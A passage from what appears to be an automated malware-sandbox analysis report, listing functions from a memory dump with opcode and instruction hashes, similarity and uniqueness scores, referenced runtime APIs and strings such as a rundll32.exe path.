    • Opcode ID: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction ID: 5ebc70a673eb80c28e15da06f1dee0750bf19152bc34c7005694386a1b1c4f66
    • Opcode Fuzzy Hash: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction Fuzzy Hash: D991073090425AAEDF1DCE69C450AFEBBB1EF42364F10CA46E875DBA91D3309552CB63
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5374E6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe
    • API String ID: 0-2837366778
    • Opcode ID: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction ID: 6a72655316f092c6fee162ecfc7533d483d24761977493ec83f12830eb8a5dd0
    • Opcode Fuzzy Hash: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction Fuzzy Hash: DD41A571E04365EBDF1ACB99CC80A9EBBF8EF86310F124466E515D7A40FB709A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52E680, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
    Download Yara Rule
    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D52E6BF
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D52E773
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction ID: f94f3fed9b4fdd98a0b42d5a7c117e4e1fabbabe57137155f48bfc45716e9551
    • Opcode Fuzzy Hash: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction Fuzzy Hash: B041F634A042499FCF08CF78C880AAE7BB5BF45318F188555E924DBBD1DB31E909CB91
    Uniqueness

    Uniqueness Score: -1.00%